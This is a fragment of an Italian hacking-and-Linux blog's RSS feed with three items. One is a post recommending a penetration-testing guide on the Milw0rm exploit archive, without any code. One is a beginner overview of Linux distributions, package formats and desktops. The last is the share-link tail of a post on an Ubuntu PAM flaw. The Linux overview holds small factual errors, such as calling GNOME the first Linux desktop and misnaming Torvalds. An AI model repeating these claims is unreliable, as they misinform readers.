<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Del.icio.us" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a digg" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technorati" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Google Bookmarks" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Segnalo" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a OKnotizie" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04&amp;url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Diggita" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;t=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FaceBook" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Upnews" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04&amp;url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a NotizieFlash" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Twitter" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04&amp;url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technotizie" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Vulnerabilit%C3%A0+PAM+Local+Privilege+Escalation+in+Ubuntu+9.10+e+10.04&amp;url=http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FriendFeed" alt="Aggiungi 'Vulnerabilità PAM Local Privilege Escalation in Ubuntu 9.10 e 10.04' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2010/07/10/vulnerabilita-pam-local-privilege-escalation-in-ubuntu-9-10-e-10-04/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>I Segreti del Penetration Test</title>
		<link>http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/</link>
		<comments>http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 19:30:15 +0000</pubDate>
		<dc:creator>Daniele Chiuri</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1409</guid>
		<description><![CDATA[In un mondo come quello di oggi dove i soldi sono più importanti della conoscenza e dove niente e nessuno è più al sicuro diventa, come abbiamo detto più volte, molto importante proteggere i propri dati online. Se è importante per noi, è fondamentale per una azienda che possiede un database con informazioni importanti se [...]]]></description>
			<content:encoded><![CDATA[<p>In un mondo come quello di oggi dove i soldi sono più importanti della conoscenza e dove niente e nessuno è più al sicuro diventa, come abbiamo detto più volte, molto importante proteggere i propri dati online. Se è importante per noi, è fondamentale per una azienda che possiede un database con informazioni importanti se non vitali. Per questo le imprese si proteggono utilizzando le teconologie informatiche migliori per proteggere i loro documenti.<br />
Dopo che una masnada di sistemisti e tecnici ha creato un database a prova di bomba serve qualcuno che lo testi al 100%. Per farlo viene chiamato un esperto a cui viene commissionato un penetration test, che non è nient&#8217;altro che un attacco al server/database su commissione.</p>
<p>Il penetration tester è un hacker vero e proprio che, però, svolge il suo lavoro alla luce del sole e nella legalità più completa (guadagnando anche dei soldi per il suo operato). Ma, come si svolge in pratica un &#8220;pen test&#8221; (come si dice volgarmente)?</p>
<p>Tutto viene spiegato in questo articolo completamente in italiano scritto dal team di backtrack Italia in particolare dal mitico brigante: <a href="http://pool.backtrack.it/BackTrack_4/Penetration/Milw0rmExploitsArchive.pdf">Milw0rm Exploits Archive</a>.</p>
<p>In questo articolo viene spiegato come si aggiorna l&#8217;archivio degli exploit, come si sfruttano le vulnerabilità usando Nmap (di cui abbiamo parlato estesamente) e di come si modifica un exploit per creare un&#8217;attacco ad hoc. Sicuramente una lettura molto interessante per capire i segreti più reconditi di un attacco hacker.</p>
<p>L&#8217;articolo utilizza, ovviamente, di come sistema operativo di partenza linux, quindi per gli utenti windows potrebbe essere una lettura un po&#8217; più &#8220;difficile&#8221; vale comunque la pena di leggerlo e, se avete qualche domanda noi siamo qui per rispondere.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'I Segreti del Penetration Test' a Del.icio.us" alt="Aggiungi 'I Segreti del Penetration Test' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'I Segreti del Penetration Test' a digg" alt="Aggiungi 'I Segreti del Penetration Test' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'I Segreti del Penetration Test' a Technorati" alt="Aggiungi 'I Segreti del Penetration Test' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'I Segreti del Penetration Test' a Google Bookmarks" alt="Aggiungi 'I Segreti del Penetration Test' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'I Segreti del Penetration Test' a Segnalo" alt="Aggiungi 'I Segreti del Penetration Test' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'I Segreti del Penetration Test' a OKnotizie" alt="Aggiungi 'I Segreti del Penetration Test' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=I+Segreti+del+Penetration+Test&amp;url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'I Segreti del Penetration Test' a Diggita" alt="Aggiungi 'I Segreti del Penetration Test' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;t=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'I Segreti del Penetration Test' a FaceBook" alt="Aggiungi 'I Segreti del Penetration Test' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/&amp;title=I+Segreti+del+Penetration+Test" title="Aggiungi 'I Segreti del Penetration Test' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'I Segreti del Penetration Test' a Upnews" alt="Aggiungi 'I Segreti del Penetration Test' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=I+Segreti+del+Penetration+Test&amp;url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'I Segreti del Penetration Test' a NotizieFlash" alt="Aggiungi 'I Segreti del Penetration Test' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'I Segreti del Penetration Test' a Twitter" alt="Aggiungi 'I Segreti del Penetration Test' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=I+Segreti+del+Penetration+Test&amp;url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'I Segreti del Penetration Test' a Technotizie" alt="Aggiungi 'I Segreti del Penetration Test' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=I+Segreti+del+Penetration+Test&amp;url=http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/" title="Aggiungi 'I Segreti del Penetration Test' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'I Segreti del Penetration Test' a FriendFeed" alt="Aggiungi 'I Segreti del Penetration Test' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2010/06/25/i-segreti-del-penetration-test/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>GNU/Linux Quale Scegliere?</title>
		<link>http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/</link>
		<comments>http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 04:31:20 +0000</pubDate>
		<dc:creator>Daniele Chiuri</dc:creator>
				<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=937</guid>
		<description><![CDATA[Tutti coloro che si sono buttati o che vogliono buttarsi nel mondo del pinguino si trovano davanti allo stesso dilemma: Quale distribuzione scelgo? Questo articolo è stato pensato per fare un po&#8217; di luce in un mondo che volutamente è tenuto nascosto alla maggioranza. Cercherò di sintetizzare in modo da avere un quadro abbastanza completo [...]]]></description>
			<content:encoded><![CDATA[<p>Tutti coloro che si sono buttati o che vogliono buttarsi nel mondo del pinguino si trovano davanti allo stesso dilemma: Quale distribuzione scelgo?<br />
Questo articolo è stato pensato per fare un po&#8217; di luce in un mondo che volutamente è tenuto nascosto alla maggioranza. Cercherò di sintetizzare in modo da avere un quadro abbastanza completo senza che dobbiate perdervi in pagine e pagine di spiegazione.</p>
<p>Innanzi tutto dobbiamo capire che cosa si intende per GNU/Linux:<br />
<a href="http://it.wikipedia.org/wiki/GNU">GNU</a> = è il sistema operativo vero e proprio lanciato per la prima volta nel 1983 dal Richard Stallman. La particolarità di questi sistemi operativi è che sono <strong>esclusivamente</strong> free.<br />
Linux = è il <a href="http://it.wikipedia.org/wiki/Kernel_Linux">kernel</a> progettato da Linux Torvalds che permette al sistema operativo di funzionare dovutamente.</p>
<p>Da queste definizioni abbiamo capito il primo capostaldo. Il kernel è sempre lo stesso ma cambiano i sistemi operativi in cui possiamo andare a lavorare. Tutti ricorrono comunemente sotto il nome di <em>Linux</em> ma ci sono delle differenze sostanziali che vale la pena di esaminare.</p>
<p>Prima però dobbiamo rispondere a una domanda che forse qualcuno si sta ponendo: Quante distribuzioni esistono?<br />
Molti di voi staranno pensando: tantissime! In effetti questa risposta è esatta ma solo in parte. E&#8217; vero che esistono moltissime distribuzioni ma è anche vero che derivano tutte da tre principali: <strong>Slackware, Red Hat e Debian</strong>.<br />
Questo ci porta alla prima sostanziale differenza tra le varie versioni di linux: <strong>i pacchetti di installazione</strong>.</p>
<p>Ognuna di queste distribuzioni ha un metodo di installazione (e dei file di installazione) differenti che ha trasmesso a tutte le versioni &#8220;figlie&#8221;. Analizziamole una per una.</p>
<p>Installazione con file <strong>RPM</strong>: l&#8217;acrostico RPM non vuol dire altro che <em>RedHat Packet Manager</em> si capisce subito chi è l&#8217;ideatore di questo metodo di installazione. Ne usufruiscono distribuzioni come Fedora e Mandriva, per citare le più comuni. Utilizzano i file RPM anche alcune distribuzioni che derivano da Slackware come per esempio SuSE, questo sta ad indicare come le divisioni non siano così nette e la discendenza da una distribuzione non esclude per forza l&#8217;implemetazione di alcune caratteristiche delle altre.</p>
<p>Installazioni con file <strong>tar</strong>: viene utilizzata principalmente da Slackware e dalle sue derivate. I file, nella maggioranza dei casi vengono scaricati con estenzione <strong>.tar.gz</strong> o <strong>.tgz</strong> nel caso siano stati compressi con gzip (che è l&#8217;estensione più comune),<strong>.tar.bz2</strong> o <strong>.tbz2</strong> o <strong>.tbz</strong> nel caso siano stati compressi con bzip2 o ancora <strong>.tar.Z</strong> nel caso siano stati compressi con compress.</p>
<p>Installazione con file <strong>.deb</strong>: come si capisce chiaramente dall&#8217;estensione questi tipi di file sono utilizzati dalla famiglia di Debian di cui fanno parte distribuzioni come Ubuntu (che sicuramente è la più diffusa), Freespire e Knoppix. Doveroso precisare che Debian è la distribuzione preferita dagli hackers.</p>
<p>Dopo aver visto quali sono i differenti tipi di file di installazione è doveroso fare una precisazione. Come avete potuto notare leggendo quanto sopra non sono mai state dette frasi come: &#8220;Questo è meglio di questo&#8221; o &#8220;Quello è meglio dell&#8217;altro&#8221;. Lo scopo di questo articolo è quello di chiarire le idee sul mare di informazioni che possiamo trovare su linux, non vuole consigliare nessuna distribuzione in particolare, anche perchè è mia convinzione personale che per scegliere la giusta distro (così le chiamano nel web) bisogna provare almeno i capostipiti, cioè i tre citati sopra o una delle derivate, in modo da vedere quella che si adatta di più al nostro gusto e alle nostre conoscenze.</p>
<p>Detto questo andiamo a considerare un&#8217;altra grande differenza tra le<br />
distro: <strong>il motore grafico</strong>.</p>
<p><strong>GNOME</strong> = GNU Network Object Model Environment è stato il primo vero e proprio motore grafico su GNU/Linux. Molti anni di esperienza garantiscono affidabilità e semplicità.</p>
<p><strong>KDE</strong> = K Desktop Environment è sicuramente il più &#8220;bello&#8221;. Con i suoi numerosi fronzoli grafici non ha nulla da invidiare ad ambienti desktop a pagamento come Windows o Mac.</p>
<p><strong>Xfce</strong> = Adatto a computer con prestazione non altissime, il massimo come rapporto tra qualità e consumo di risorse.</p>
<p><strong>Enlightenment</strong> = Motore grafico non comunissimo ma che non ha nulla da invidiare agli altri tre.</p>
<p>Ho fatto solo una breve carrellata perchè non volevo scendere in particolari che avrebbero reso pesante questa trattazione. Comunque volevo fare due precisazioni. I due motori grafici più comuni sono Gnome e KDE e sono quelli che vengono usati da quasi tutte le distribuzioni più diffuse. Per esempio SuSE, Kubuntu, Mandriva usano KDE, Ubuntu invece usa Gnome. Il motore grafico in se non ha molto a che fare con la distribuzione quindi alla fine scegliete quello che vi piace di più. Per esempio se andate nel sito di ubuntu scoprirete che si può scaricare anche con altri motori grafici. Esiste kubuntu con KDE, xubuntu con Xfce ed Ebuntu con Enlightenment. Come vi dicevo è solo una questione di gusti.</p>
<p>Ora avete un&#8217;infarinatura globale del mondo GNU/Linux come ho già detto questo articolo non pretende di darvi TUTTE le spiegazioni, anche perchè i più esperti troveranno delle piccole imprecisioni dovute al fatto che ho voluto semplificare al massimo. Comunque per rendere questo articolo ancora più utile potete commentare tutto ciò che io non ho detto (e anche correggere quello che ho detto) e spiegarlo in parole semplici in questo modo tutti gli aspiranti hackers lettori di PH potranno buttarsi nel mondo del pinguino e slegarsi dal software a pagamento.</p>
<p><em>Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore di <a href="http://www.pillolhacking.net/2009/04/07/libro-fantasmi-della-rete/">Fantasmi della rete</a></em></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Del.icio.us" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a digg" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Technorati"><img 